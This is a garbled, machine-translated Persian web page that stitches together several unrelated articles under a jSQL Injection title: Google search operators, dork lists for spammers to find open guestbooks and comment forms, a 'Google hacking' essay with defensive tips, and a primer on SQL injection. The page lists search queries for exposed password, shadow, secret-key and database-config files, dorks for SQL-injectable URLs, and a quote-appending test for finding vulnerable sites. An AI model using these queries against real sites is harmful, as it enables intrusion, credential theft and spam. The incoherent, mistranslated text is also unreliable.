• دستورالعمل استفاده از jSQL Injection، ابزاری چند منظوره برای یافتن و بهره برداری از تزریق SQL در کالی لینوکس. دستورالعمل استفاده از jSQL Injection - یک ابزار چند منظوره برای جستجو و بهره برداری از تزریق SQL در Kali Linux Ka

    چگونه با استفاده از google.com به درستی جستجو کنیم

    احتمالاً همه می دانند که چگونه از موتور جستجویی مانند گوگل استفاده کنند =) اما همه نمی دانند که اگر یک عبارت جستجو را به درستی با استفاده از ساختارهای خاص بنویسید، می توانید به نتایج آنچه به دنبال آن هستید بسیار کارآمدتر و سریع تر برسید =) در این مقاله من سعی خواهم کرد آن را نشان دهم و آنچه را که برای جستجوی صحیح باید انجام دهید

    Google از چندین اپراتور جستجوی پیشرفته پشتیبانی می کند که هنگام جستجو در google.com معنای خاصی دارند. به طور معمول، این عبارات جستجو را تغییر می دهند، یا حتی به گوگل می گویند که انواع مختلف جستجو را انجام دهد. به عنوان مثال، link: construct یک عملگر ویژه است و درخواست لینک: www.google.comبه شما یک جستجوی معمولی نمی دهد، اما در عوض تمام صفحات وب را که پیوندهایی به google.com دارند پیدا می کند.
    انواع درخواست جایگزین

    حافظه پنهان: اگر کلمات دیگری را در یک پرس و جو قرار دهید، Google آن کلمات موجود در سند ذخیره شده را برجسته می کند.
    مثلا، کش: www.webمحتوای ذخیره شده را با کلمه "وب" برجسته نشان می دهد.

    پیوند: عبارت جستجوی بالا صفحات وب را نشان می دهد که حاوی پیوندهایی به درخواست مشخص شده است.
    مثلا: لینک:www.siteتمام صفحاتی که دارای پیوند به http://www.site هستند نمایش داده می شود

    مرتبط: صفحات وب را که "مربوط" به صفحه وب مشخص شده نشان می دهد.
    مثلا، مرتبط: www.google.comصفحات وب مشابه صفحه اصلی گوگل را فهرست می کند.

    اطلاعات: اطلاعات درخواستی: برخی از اطلاعاتی که گوگل در مورد صفحه وب درخواستی شما دارد را ارائه می دهد.
    مثلا، اطلاعات: وب سایتاطلاعاتی در مورد انجمن ما نشان خواهد داد =) (Armada - Adult Webmasters Forum).

    سایر درخواست های اطلاعاتی

    define: پرس و جو define: تعریفی از کلماتی که بعد از آن وارد می کنید، از منابع مختلف آنلاین جمع آوری می کند. این تعریف برای کل عبارت وارد شده خواهد بود (یعنی شامل تمام کلمات در عبارت جستجوی دقیق می شود).

    سهام: اگر یک پرس و جو را با سهام شروع کنید: Google بقیه شرایط پرس و جو را به عنوان نمادهای سهام پردازش می کند و به صفحه ای پیوند می دهد که اطلاعات آماده برای این نمادها را نشان می دهد.
    مثلا، سهام: Intel yahooاطلاعاتی در مورد اینتل و یاهو نشان خواهد داد. (توجه داشته باشید که باید نمادهای اخبار فوری را تایپ کنید نه نام شرکت)

    اصلاح کننده های پرس و جو

    site: اگر سایت: را در جستجوی خود قرار دهید، گوگل نتایج را به وب سایت هایی که در آن دامنه پیدا می کند محدود می کند.
    شما همچنین می توانید بر اساس مناطق جداگانه جستجو کنید، مانند ru، org، com، و غیره ( سایت: کام سایت:ru)

    allintitle: اگر یک پرس و جو با allintitle: اجرا کنید، گوگل نتایج را به تمام کلمات جستجو در عنوان محدود می کند.
    مثلا، allintitle: جستجو در گوگلتمام صفحات گوگل را با جستجو مانند تصاویر، وبلاگ و غیره برمی گرداند

    intitle: اگر intitle: را در جستجوی خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در عنوان هستند محدود می کند.
    مثلا، عنوان: کسب و کار

    allinurl: اگر یک پرس و جو را با allinurl اجرا کنید: Google نتایج را به تمام کلمات جستجو در URL محدود می کند.
    مثلا، allinurl: جستجو در گوگلاسناد را با گوگل برمی گرداند و در عنوان جستجو می کند. همچنین، به عنوان یک گزینه، می توانید کلمات را با علامت (/) جدا کنید، سپس کلمات دو طرف اسلش در همان صفحه جستجو می شوند: مثال allinurl: foo/bar

    inurl: اگر inurl: را در جستجوی خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در URL هستند محدود می کند.
    مثلا، انیمیشن inurl:site

    intext: فقط کلمه مشخص شده را در متن صفحه جستجو می کند، بدون توجه به عنوان و متن های پیوند، و موارد دیگر که به آن مرتبط نیستند. همچنین مشتقی از این اصلاح کننده وجود دارد - allintext: i.e. علاوه بر این، تمام کلمات موجود در پرس و جو فقط در متن جستجو می شوند، که می تواند مهم باشد و کلمات پرکاربرد در پیوندها را نادیده بگیرد.
    مثلا، intext: انجمن

    daterange: جستجوها در یک چارچوب زمانی (daterange:2452389-2452389)، تاریخ‌ها برای زمان‌ها در قالب جولیان هستند.

    خوب، و انواع و اقسام نمونه های جالب از پرس و جوها

    نمونه هایی از نوشتن پرس و جو برای گوگل. برای اسپمرها

    Inurl:control.guest?a=sign

    Site:books.dreambook.com "URL صفحه اصلی" "Sign my" inurl:sign

    سایت: www.freegb.net صفحه اصلی

    Inurl:sign.asp «تعداد کاراکترها»

    "پیام:" inurl:sign.cfm "فرستنده:"

    Inurl:register.php "ثبت کاربر" "وب سایت"

    Inurl:edu/کتاب مهمان «کتاب مهمان را امضا کنید»

    Inurl: ارسال "پست نظر" "URL"

    Inurl:/archives/ "Comments:" "اطلاعات را به خاطر دارید؟"

    "اسکریپت و کتاب مهمان ایجاد شده توسط:" "URL:" "نظرات:"

    Inurl:?action=add "phpBook" "URL"

    عنوان: "ارسال داستان جدید"

    مجلات

    Inurl:www.livejournal.com/users/ mode=reply

    Inurl greatestjournal.com/ mode=reply

    Inurl:fastbb.ru/re.pl؟

    Inurl:fastbb.ru /re.pl؟ "کتاب مهمان"

    وبلاگ ها

    Inurl:blogger.com/comment.g?”postID””ناشناس”

    Inurl:typepad.com/ "یک نظر ارسال کنید" "اطلاعات شخصی را به خاطر دارید؟"

    Inurl:greatestjournal.com/community/ "ارسال نظر" "آدرس پوسترهای ناشناس"

    "پست نظر" "آدرس پوسترهای ناشناس" -

    عنوان: ارسال نظر

    Inurl:pirillo.com "ارسال نظر"

    انجمن ها

    Inurl:gate.html?”name=Forums” “mode=reply”

    Inurl:”forum/posting.php?mode=reply”

    Inurl:"mes.php?"

    Inurl:”members.html”

    Inurl:forum/memberlist.php؟”

    هک کردن با گوگل

    الکساندر آنتیپوف

    موتور جستجوی گوگل (www.google.com) گزینه های جستجوی زیادی را ارائه می دهد. همه این ویژگی ها ابزار جستجوی ارزشمندی برای کاربر تازه وارد به اینترنت و در عین حال سلاحی قدرتمندتر برای تهاجم و تخریب در دستان افرادی با نیات شیطانی، از جمله نه تنها هکرها، بلکه مجرمان غیر رایانه ای و حتی تروریست ها
    (9475 بازدید در 1 هفته)


    دنیس بارانکوف
    denisNOSPAMixi.ru

    توجه: این مقاله راهنمای عمل نیست. این مقاله برای شما مدیران وب سرور نوشته شده است تا احساس کاذب امنیت خود را از دست بدهید و در نهایت موذیانه بودن این روش کسب اطلاعات را درک کرده و وظیفه حفاظت از سایت خود را بر عهده بگیرید.

    معرفی

    مثلا 1670 صفحه در 0.14 ثانیه پیدا کردم!

    2. خط دیگری را وارد کنید، به عنوان مثال:

    inurl:"auth_user_file.txt"

    کمی کمتر، اما این در حال حاضر برای دانلود رایگان و حدس زدن رمز عبور (با استفاده از همان John The Ripper) کافی است. در زیر تعدادی مثال دیگر می زنم.

    بنابراین، باید بدانید که موتور جستجوی گوگل از اکثر سایت های اینترنتی بازدید کرده و اطلاعات موجود در آنها را در حافظه پنهان ذخیره کرده است. این اطلاعات ذخیره شده به شما این امکان را می دهد که بدون اتصال مستقیم به سایت، تنها با جستجو در اطلاعات ذخیره شده در گوگل، اطلاعاتی در مورد سایت و محتوای سایت به دست آورید. علاوه بر این، اگر اطلاعات موجود در سایت دیگر در دسترس نباشد، ممکن است اطلاعات موجود در حافظه پنهان همچنان حفظ شود. تنها چیزی که برای این روش نیاز دارید دانستن چند کلمه کلیدی گوگل است. این تکنیک Google Hacking نام دارد.

    اطلاعات مربوط به هک گوگل برای اولین بار 3 سال پیش در لیست پستی Bugtruck ظاهر شد. در سال 2001 این موضوع توسط یک دانشجوی فرانسوی مطرح شد. در اینجا پیوندی به این نامه آمده است http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. این اولین نمونه از چنین پرسش هایی را ارائه می دهد:

    1) فهرست /admin
    2) فهرست رمز عبور /
    3) فهرست /mail
    4) فهرست / +banques +filetype:xls (برای فرانسه...)
    5) فهرست / +passwd
    6) فهرست / password.txt

    این موضوع اخیراً موجی را در بخش انگلیسی خواندنی اینترنت ایجاد کرد: پس از مقاله جانی لانگ که در 7 می 2004 منتشر شد. برای مطالعه کامل تر در مورد هک گوگل، به شما توصیه می کنم به وب سایت این نویسنده http://johnny.ihackstuff.com بروید. در این مقاله فقط می خواهم شما را به روز کنم.

    چه کسی می تواند از این استفاده کند:
    - روزنامه نگاران، جاسوسان و همه افرادی که دوست دارند بینی خود را در تجارت دیگران فرو کنند، می توانند از این برای جستجوی شواهد متهم استفاده کنند.
    - هکرها به دنبال اهداف مناسب برای هک هستند.

    گوگل چگونه کار می کند

    برای ادامه گفتگو، اجازه دهید برخی از کلمات کلیدی مورد استفاده در جستجوهای گوگل را به شما یادآوری کنم.

    با استفاده از علامت + جستجو کنید

    گوگل کلماتی را که بی اهمیت می داند از جستجوها حذف می کند. به عنوان مثال، کلمات پرسشی، حروف اضافه و مقالات در زبان انگلیسی: برای مثال are, of, where. در زبان روسی، به نظر می رسد گوگل همه کلمات را مهم می داند. اگر کلمه ای از جستجو حذف شود، گوگل در مورد آن می نویسد. برای اینکه گوگل شروع به جستجوی صفحاتی با این کلمات کند، باید علامت + بدون فاصله قبل از کلمه اضافه کنید. مثلا:

    آس +پایه

    جستجو با استفاده از علامت -

    اگر گوگل تعداد زیادی صفحه پیدا کند که باید صفحاتی با موضوع خاصی را از آنها حذف کند، می توانید گوگل را مجبور کنید فقط صفحاتی را جستجو کند که حاوی کلمات خاصی نیستند. برای این کار باید این کلمات را با قرار دادن علامتی در مقابل هر کدام - بدون فاصله قبل از کلمه - مشخص کنید. مثلا:

    ماهیگیری - ودکا

    جستجو با استفاده از ~

    ممکن است بخواهید نه تنها کلمه مشخص شده، بلکه مترادف آن را نیز جستجو کنید. برای انجام این کار، قبل از کلمه با علامت ~ قرار دهید.

    پیدا کردن یک عبارت دقیق با استفاده از دو نقل قول

    گوگل در هر صفحه همه تکرار کلماتی را که در رشته پرس و جو نوشته اید جستجو می کند و به موقعیت نسبی کلمات اهمیتی نمی دهد، تا زمانی که همه کلمات مشخص شده همزمان در صفحه باشند (این عمل پیش فرض). برای یافتن عبارت دقیق، باید آن را در نقل قول قرار دهید. مثلا:

    "پایه کتاب"

    برای داشتن حداقل یکی از کلمات مشخص شده، باید عملیات منطقی را به صراحت مشخص کنید: OR. مثلا:

    ایمنی کتاب یا حفاظت

    علاوه بر این، می توانید از علامت * در نوار جستجو برای نشان دادن هر کلمه و. برای نشان دادن هر شخصیت

    جستجوی کلمات با استفاده از عملگرهای اضافی

    عملگرهای جستجویی وجود دارند که در رشته جستجو با فرمت مشخص شده اند:

    عملگر:search_term

    فضاهای کنار روده بزرگ لازم نیست. اگر یک فاصله بعد از دو نقطه وارد کنید، یک پیغام خطا مشاهده می کنید و قبل از آن، گوگل از آنها به عنوان یک رشته جستجوی معمولی استفاده می کند.
    گروه‌هایی از اپراتورهای جستجوی اضافی وجود دارد: زبان‌ها - نشان می‌دهد که به کدام زبان می‌خواهید نتیجه را ببینید، تاریخ - محدود کردن نتایج برای سه، شش یا 12 ماه گذشته، موارد - نشان می‌دهد کجا در سند باید جستجو کنید. خط: در همه جا، در عنوان، در URL، دامنه ها - در سایت مشخص شده جستجو کنید یا برعکس، آن را از جستجو حذف کنید؛ جستجوی ایمن - سایت های حاوی نوع مشخص شده از اطلاعات را مسدود می کند و آنها را از صفحات نتایج جستجو حذف می کند.
    در عین حال، برخی از اپراتورها به پارامتر اضافی نیاز ندارند، به عنوان مثال، درخواست "cache:www.google.com" را می توان به عنوان یک رشته جستجوی تمام عیار نامید، و برخی از کلمات کلیدی، برعکس، نیاز به جستجو دارند. کلمه، به عنوان مثال "site:www. google.com help ". با توجه به موضوع ما، اجازه دهید به عملگرهای زیر نگاه کنیم:

    اپراتور

    شرح

    به یک پارامتر اضافی نیاز دارد؟

    فقط در سایت مشخص شده در search_term جستجو کنید

    فقط در اسناد با نوع search_term جستجو کنید

    صفحات حاوی search_term را در عنوان پیدا کنید

    صفحاتی را که شامل همه کلمات search_term در عنوان هستند پیدا کنید

    صفحات حاوی کلمه search_term را در آدرس خود پیدا کنید

    صفحاتی را پیدا کنید که حاوی همه کلمات search_term در آدرس آنها هستند

    اپراتور سایت: جستجو را فقط به سایت مشخص شده محدود می کند و شما می توانید نه تنها نام دامنه، بلکه آدرس IP را نیز مشخص کنید. برای مثال وارد کنید:

    عملگر filetype: جستجو را به یک نوع فایل خاص محدود می کند. مثلا:

    از تاریخ انتشار مقاله، گوگل می تواند در 13 فرمت فایل مختلف جستجو کند:

    • فرمت سند قابل حمل Adobe (pdf)
    • Adobe PostScript (ps)
    • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
    • Lotus WordPro (lwp)
    • مک رایت (mw)
    • مایکروسافت اکسل (xls)
    • پاورپوینت مایکروسافت (ppt)
    • Microsoft Word (doc)
    • Microsoft Works (wks، wps، wdb)
    • مایکروسافت رایت (wri)
    • فرمت متن غنی (rtf)
    • Shockwave Flash (swf)
    • متن (ans, txt)

    عملگر پیوند: تمام صفحاتی که به صفحه مشخص شده اشاره دارند را نشان می دهد.
    احتمالاً همیشه جالب است که ببینید چند مکان در اینترنت در مورد شما می‌دانند. بیایید سعی کنیم:

    اپراتور کش: نسخه سایت را در حافظه پنهان Google به گونه ای نشان می دهد که آخرین باری که گوگل از آن صفحه بازدید کرده بود به نظر می رسید. بیایید هر سایتی که اغلب در حال تغییر است را بررسی کنیم و نگاه کنیم:

    عملگر intitle: یک کلمه مشخص شده را در عنوان یک صفحه جستجو می کند. عملگر allintitle: یک پسوند است - همه کلمات چندگانه مشخص شده را در عنوان صفحه جستجو می کند. مقایسه کنید:

    عنوان: پرواز به مریخ
    intitle:flight intitle:on intitle:mars
    allintitle: پرواز به مریخ

    عملگر inurl: باعث می شود که گوگل تمام صفحات حاوی رشته مشخص شده را در URL نشان دهد. اپراتور allinurl: همه کلمات را در یک URL جستجو می کند. مثلا:

    allinurl:acid acid_stat_alerts.php

    این دستور به ویژه برای کسانی که SNORT ندارند مفید است - حداقل آنها می توانند ببینند که چگونه در یک سیستم واقعی کار می کند.

    روش های هک با استفاده از گوگل

    بنابراین، متوجه شدیم که با استفاده از ترکیبی از عملگرها و کلمات کلیدی فوق، هر کسی می تواند اطلاعات لازم را جمع آوری کرده و آسیب پذیری ها را جستجو کند. این تکنیک ها اغلب هک گوگل نامیده می شوند.

    نقشه سایت

    شما می توانید از عملگر site: برای فهرست کردن تمام پیوندهایی که گوگل در یک سایت پیدا کرده است استفاده کنید. به طور معمول، صفحاتی که به صورت پویا توسط اسکریپت ها ایجاد می شوند با استفاده از پارامترها ایندکس نمی شوند، بنابراین برخی از سایت ها از فیلترهای ISAPI استفاده می کنند تا پیوندها به شکل /article.asp?num=10&dst=5 نباشند، بلکه با اسلش /article/abc/num/ باشند. 10/ dst/5. این کار به این دلیل انجام می شود که سایت به طور کلی توسط موتورهای جستجو ایندکس می شود.

    بیایید سعی کنیم:

    سایت: www.whitehouse.gov Whitehouse

    گوگل فکر می کند که هر صفحه در یک وب سایت حاوی کلمه Whitehouse است. این همان چیزی است که ما برای دریافت تمام صفحات استفاده می کنیم.
    یک نسخه ساده شده نیز وجود دارد:

    سایت:whitehouse.gov

    و بهترین بخش این است که رفقای whitehouse.gov حتی نمی‌دانستند که ما به ساختار سایت آنها نگاه کردیم و حتی به صفحات ذخیره‌شده‌ای که گوگل دانلود کرده بود نگاه کردیم. این می تواند برای مطالعه ساختار سایت ها و مشاهده محتوا مورد استفاده قرار گیرد و فعلاً ناشناخته باقی بماند.

    مشاهده لیستی از فایل ها در فهرست ها

    سرورهای وب می توانند به جای صفحات HTML معمولی، فهرستی از دایرکتوری های سرور را نمایش دهند. این معمولا برای اطمینان از انتخاب و دانلود فایل های خاص توسط کاربران انجام می شود. با این حال، در بسیاری از موارد، مدیران قصد ندارند محتویات یک فهرست را نشان دهند. این به دلیل پیکربندی نادرست سرور یا عدم وجود صفحه اصلی در دایرکتوری رخ می دهد. در نتیجه، هکر این شانس را دارد که چیز جالبی را در فهرست پیدا کند و از آن برای اهداف خود استفاده کند. برای یافتن تمام این صفحات کافی است توجه داشته باشید که همه آنها حاوی کلمات: index of هستند. اما از آنجایی که فهرست کلمات فقط شامل چنین صفحاتی نمی شود، باید پرس و جو را اصلاح کنیم و کلمات کلیدی موجود در خود صفحه را در نظر بگیریم، بنابراین پرس و جوهایی مانند:

    intitle:index.of دایرکتوری والد
    intitle:index.of name size

    از آنجایی که بیشتر فهرست‌های دایرکتوری عمدی هستند، ممکن است در اولین بار برای یافتن فهرست‌های نابجا با مشکل مواجه شوید. اما حداقل می‌توانید از فهرست‌ها برای تعیین نسخه سرور وب استفاده کنید، همانطور که در زیر توضیح داده شده است.

    دریافت نسخه وب سرور.

    دانستن نسخه سرور وب همیشه قبل از شروع هر حمله هکری مفید است. باز هم به لطف گوگل، می توانید این اطلاعات را بدون اتصال به سرور دریافت کنید. اگر به فهرست دایرکتوری دقت کنید، می بینید که نام سرور وب و نسخه آن در آنجا نمایش داده می شود.

    Apache1.3.29 - سرور ProXad در پورت 80 trf296.free.fr

    یک مدیر با تجربه می تواند این اطلاعات را تغییر دهد، اما، به عنوان یک قاعده، درست است. بنابراین، برای به دست آوردن این اطلاعات کافی است یک درخواست ارسال کنید:

    intitle:index.of server.at

    برای به دست آوردن اطلاعات برای یک سرور خاص، درخواست را روشن می کنیم:

    intitle:index.of server.at site:ibm.com

    یا برعکس، ما به دنبال سرورهایی هستیم که نسخه خاصی از سرور را اجرا می کنند:

    intitle:index.of Apache/2.0.40 Server at

    این تکنیک می تواند توسط یک هکر برای یافتن قربانی استفاده شود. به عنوان مثال، اگر او یک اکسپلویت برای نسخه خاصی از وب سرور داشته باشد، می تواند آن را پیدا کند و اکسپلویت موجود را امتحان کند.

    همچنین می توانید با مشاهده صفحاتی که به طور پیش فرض در هنگام نصب آخرین نسخه وب سرور نصب شده اند، نسخه سرور را دریافت کنید. به عنوان مثال، برای دیدن صفحه آزمایشی Apache 1.2.6، فقط تایپ کنید

    intitle:Test.Page.for.Apache it.worked!

    علاوه بر این، برخی از سیستم عامل ها بلافاصله سرور وب را در هنگام نصب نصب و راه اندازی می کنند. با این حال، برخی از کاربران حتی از این موضوع آگاه نیستند. به طور طبیعی، اگر می بینید که شخصی صفحه پیش فرض را حذف نکرده است، منطقی است که فرض کنیم کامپیوتر اصلاً تحت هیچ گونه سفارشی سازی قرار نگرفته است و احتمالاً در برابر حمله آسیب پذیر است.

    صفحات IIS 5.0 را جستجو کنید

    allintitle:به Windows 2000 Internet Services خوش آمدید

    در مورد IIS، می توانید نه تنها نسخه سرور، بلکه نسخه ویندوز و سرویس پک را نیز تعیین کنید.

    راه دیگر برای تعیین نسخه WEB server جستجوی راهنماها (صفحات راهنما) و نمونه هایی است که ممکن است به طور پیش فرض روی سایت نصب شوند. هکرها راه های زیادی برای استفاده از این مؤلفه ها برای به دست آوردن دسترسی ممتاز به یک سایت پیدا کرده اند. به همین دلیل است که باید این قطعات را در سایت تولید حذف کنید. ناگفته نماند که با وجود این قطعات می توان اطلاعاتی در مورد نوع سرور و نسخه آن به دست آورد. به عنوان مثال، بیایید راهنمای آپاچی را پیدا کنیم:

    inurl:دستی ماژول های دستورالعمل آپاچی

    استفاده از گوگل به عنوان اسکنر CGI.

    اسکنر CGI یا WEB scanner ابزاری برای جستجوی اسکریپت ها و برنامه های آسیب پذیر در سرور قربانی است. این ابزارها باید بدانند که به دنبال چه چیزی بگردند، برای این کار آنها یک لیست کامل از فایل های آسیب پذیر دارند، به عنوان مثال:

    /cgi-bin/cgiemail/uargg.txt
    /random_banner/index.cgi
    /random_banner/index.cgi
    /cgi-bin/mailview.cgi
    /cgi-bin/maillist.cgi
    /cgi-bin/userreg.cgi

    /iissamples/ISSamples/SQLQHit.asp
    /SiteServer/admin/findvserver.asp
    /scripts/cphost.dll
    /cgi-bin/finger.cgi

    ما می‌توانیم هر یک از این فایل‌ها را با استفاده از Google پیدا کنیم، به‌علاوه با استفاده از کلمات index of یا inurl با نام فایل در نوار جستجو: می‌توانیم سایت‌هایی با اسکریپت‌های آسیب‌پذیر پیدا کنیم، برای مثال:

    allinurl:/random_banner/index.cgi

    با استفاده از دانش اضافی، یک هکر می تواند از آسیب پذیری یک اسکریپت سوء استفاده کند و از این آسیب پذیری برای وادار کردن اسکریپت به انتشار هر فایل ذخیره شده در سرور استفاده کند. به عنوان مثال، یک فایل رمز عبور.

    چگونه از خود در برابر هک گوگل محافظت کنیم. 1. داده های مهم را در وب سرور پست نکنید.

    حتی اگر داده‌ها را به‌طور موقت پست کرده‌اید، ممکن است آن‌ها را فراموش کنید یا کسی وقت داشته باشد که این داده‌ها را قبل از پاک کردن پیدا کند و بگیرد. این کار را نکن راه های زیادی برای انتقال داده ها وجود دارد که از آن ها در برابر سرقت محافظت می کند.

    2. سایت خود را بررسی کنید.

    از روش های توضیح داده شده برای تحقیق در مورد سایت خود استفاده کنید. سایت خود را به صورت دوره ای برای روش های جدیدی که در سایت http://johnny.ihackstuff.com ظاهر می شود بررسی کنید. به یاد داشته باشید که اگر می خواهید اقدامات خود را خودکار کنید، باید مجوز ویژه ای از Google دریافت کنید. اگر با دقت بخوانید http://www.google.com/terms_of_service.html، سپس عبارت را مشاهده می کنید: شما نمی توانید درخواست های خودکار از هر نوع را بدون مجوز صریح از قبل از Google به سیستم Google ارسال کنید.

    3. ممکن است نیازی به Google برای ایندکس کردن سایت یا بخشی از آن نداشته باشید.

    گوگل به شما این امکان را می دهد که لینک سایت خود یا بخشی از آن را از پایگاه داده خود حذف کنید و همچنین صفحات را از کش حذف کنید. علاوه بر این، شما می توانید جستجوی تصاویر در سایت خود را ممنوع کنید، از نمایش قطعات کوتاه صفحات در نتایج جستجو جلوگیری کنید.تمامی احتمالات برای حذف یک سایت در صفحه توضیح داده شده است. http://www.google.com/remove.html. برای انجام این کار، باید تأیید کنید که واقعاً مالک این سایت هستید یا برچسب ها را در صفحه یا

    4. از robots.txt استفاده کنید

    مشخص است که موتورهای جستجو به فایل robots.txt واقع در ریشه سایت نگاه می کنند و قسمت هایی را که با کلمه Disallow مشخص شده اند ایندکس نمی کنند. می توانید از این برای جلوگیری از ایندکس شدن بخشی از سایت استفاده کنید. به عنوان مثال، برای جلوگیری از ایندکس شدن کل سایت، یک فایل robots.txt حاوی دو خط ایجاد کنید:

    عامل کاربر: *
    غیر مجاز:/

    چه اتفاقی می افتد

    برای اینکه زندگی به نظر شما عزیز نباشد، در نهایت می‌گویم که سایت‌هایی وجود دارند که افرادی هستند که با استفاده از روش‌های ذکر شده در بالا، به دنبال حفره‌هایی در اسکریپت‌ها و سرورهای وب می‌گردند. نمونه ای از چنین صفحه ای است

    کاربرد.

    کمی شیرین. برخی از موارد زیر را برای خود امتحان کنید:

    1. #mysql dump نوع فایل: sql - جستجوی داده‌های پایگاه داده mySQL
    2. گزارش خلاصه آسیب پذیری میزبان - به شما نشان می دهد که سایر افراد چه آسیب پذیری هایی پیدا کرده اند
    3. phpMyAdmin در حال اجرا بر روی inurl:main.php - این باعث می شود کنترل از طریق پانل phpmyadmin بسته شود.
    4. برای توزیع محرمانه نیست
    5. درخواست جزئیات کنترل متغیرهای سرور درخت
    6. دویدن در حالت کودک
    7. این گزارش توسط WebLog تولید شده است
    8. intitle:index.of cgiirc.config
    9. filetype:conf inurl:firewall -intitle:cvs - شاید کسی به فایل های پیکربندی فایروال نیاز داشته باشد؟ :)
    10. intitle:index.of finances.xls – hmm....
    11. عنوان: فهرست چت های dbconvert.exe – گزارش های چت icq
    12.intext:تجزیه و تحلیل ترافیک Tobias Oetiker
    13. عنوان: آمار استفاده برای ایجاد شده توسط Webalizer
    14. عنوان: آمار آمار پیشرفته وب
    15. intitle:index.of ws_ftp.ini – ws ftp config
    16. inurl:ipsec.secrets دارای اسرار مشترک است - کلید مخفی - پیدا کردن خوب
    17. inurl:main.php به phpMyAdmin خوش آمدید
    18. inurl:server-info اطلاعات سرور آپاچی
    19. سایت:edu نمرات مدیریت
    20. ORA-00921: پایان غیرمنتظره دستور SQL – گرفتن مسیرها
    21. عنوان: index.of trillian.ini
    22. عنوان: فهرست pwd.db
    23.intitle:index.of people.lst
    24. intitle:index.of master.passwd
    25.inurl:passlist.txt
    26. عنوان: فهرست mysql_history
    27. intitle:index of intext:globals.inc
    28. عنوان:index.of administrators.pwd
    29. عنوان: Index.of etc shadow
    30.intitle:index.ofsecring.pgp
    31. inurl:config.php dbuname dbpass
    32. inurl:perform filetype:ini

  • "هک کردن mit Google"
  • مرکز آموزشی "Informzashita" http://www.itsecurity.ru - یک مرکز تخصصی پیشرو در زمینه آموزش امنیت اطلاعات (مجوز کمیته آموزش مسکو شماره 015470، اعتبارنامه دولتی شماره 004251). تنها مرکز آموزش مجاز سیستم های امنیت اینترنت و Clearswift در روسیه و کشورهای CIS. مرکز آموزشی مجاز مایکروسافت (تخصص امنیتی). برنامه های آموزشی با کمیسیون فنی دولتی روسیه، FSB (FAPSI) هماهنگ می شود. گواهینامه های آموزشی و اسناد دولتی در مورد آموزش پیشرفته.

    SoftKey یک سرویس منحصر به فرد برای خریداران، توسعه دهندگان، فروشندگان و شرکای وابسته است. علاوه بر این، این یکی از بهترین فروشگاه های نرم افزار آنلاین در روسیه، اوکراین، قزاقستان است که طیف گسترده ای از محصولات، روش های پرداخت بسیاری، پردازش سفارش سریع (اغلب فوری)، پیگیری روند سفارش در بخش شخصی، انواع مختلف را به مشتریان ارائه می دهد. تخفیف از فروشگاه و تولید کنندگان BY.

    تصمیم گرفتم کمی در مورد امنیت اطلاعات صحبت کنم. این مقاله برای برنامه نویسان تازه کار و کسانی که به تازگی شروع به توسعه Frontend کرده اند مفید خواهد بود. مشکل چیه؟

    بسیاری از توسعه دهندگان مبتدی به قدری از نوشتن کد غافلگیر می شوند که امنیت کار خود را کاملاً فراموش می کنند. و مهمتر از همه، آنها آسیب پذیری هایی مانند پرس و جوهای SQL و XXS را فراموش می کنند. آنها همچنین رمزهای عبور آسانی را برای پنل های اداری خود ارائه می دهند و در معرض زور وحشیانه قرار می گیرند. این حملات چیست و چگونه می توان از آنها جلوگیری کرد؟

    تزریق SQL

    تزریق SQL رایج ترین نوع حمله به پایگاه داده است که در طی یک پرس و جوی SQL برای یک DBMS خاص انجام می شود. بسیاری از مردم و حتی شرکت های بزرگ از چنین حملاتی رنج می برند. دلیل آن یک خطای توسعه دهنده هنگام نوشتن پایگاه داده و به عبارت دقیق تر، پرس و جوهای SQL است.

    حمله تزریق SQL به دلیل پردازش نادرست داده های ورودی مورد استفاده در پرس و جوهای SQL امکان پذیر است. اگر حمله یک هکر موفقیت آمیز باشد، نه تنها محتویات پایگاه های داده، بلکه رمزهای عبور و گزارش های پنل مدیریتی را نیز از دست خواهید داد. و این داده ها برای تصاحب کامل سایت یا انجام تنظیمات برگشت ناپذیر در آن کاملاً کافی خواهد بود.

    این حمله را می توان با موفقیت در اسکریپت های نوشته شده در PHP، ASP، Perl و سایر زبان ها بازتولید کرد. موفقیت چنین حملاتی بیشتر به این بستگی دارد که از چه DBMS استفاده می شود و خود اسکریپت چگونه پیاده سازی می شود. سایت های آسیب پذیر زیادی برای تزریق SQL در دنیا وجود دارد. این به راحتی قابل تأیید است. فقط "dorks" را وارد کنید - اینها پرس و جوهای ویژه برای جستجوی سایت های آسیب پذیر هستند. در اینجا به برخی از آنها اشاره می کنیم:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    چگونه از آنها استفاده کنیم؟ فقط آنها را در موتور جستجوی Google یا Yandex وارد کنید. موتور جستجو نه تنها یک سایت آسیب پذیر، بلکه صفحه ای در مورد این آسیب پذیری در اختیار شما قرار می دهد. اما ما در اینجا متوقف نمی‌شویم و مطمئن می‌شویم که صفحه واقعاً آسیب‌پذیر است. برای انجام این کار، کافی است یک نقل قول “‘ بعد از مقدار “id=1” قرار دهید. چیزی شبیه به این:

    • inurl:games.php?id=1'

    و سایت یک خطا در مورد پرس و جو SQL به ما می دهد. هکر ما در مرحله بعد به چه چیزی نیاز دارد؟

    و سپس او به همین پیوند به صفحه خطا نیاز دارد. سپس کار بر روی آسیب پذیری در اکثر موارد در توزیع "Kali linux" با ابزارهای آن برای این بخش انجام می شود: معرفی کد تزریق و انجام عملیات لازم. چگونه این اتفاق خواهد افتاد، نمی توانم به شما بگویم. اما می توانید اطلاعاتی در این مورد در اینترنت پیدا کنید.

    حمله XSS

    این نوع حمله بر روی فایل های کوکی ها انجام می شود. کاربران نیز به نوبه خود دوست دارند آنها را ذخیره کنند. چرا که نه؟ ما بدون آنها چکار کنیم؟ از این گذشته، به لطف کوکی ها، ما مجبور نیستیم رمز عبور Vk.com یا Mail.ru را صد بار وارد کنیم. و تعداد کمی هستند که آنها را رد کنند. اما در اینترنت، اغلب برای هکرها یک قانون ظاهر می شود: ضریب راحتی مستقیماً با ضریب ناامنی متناسب است.

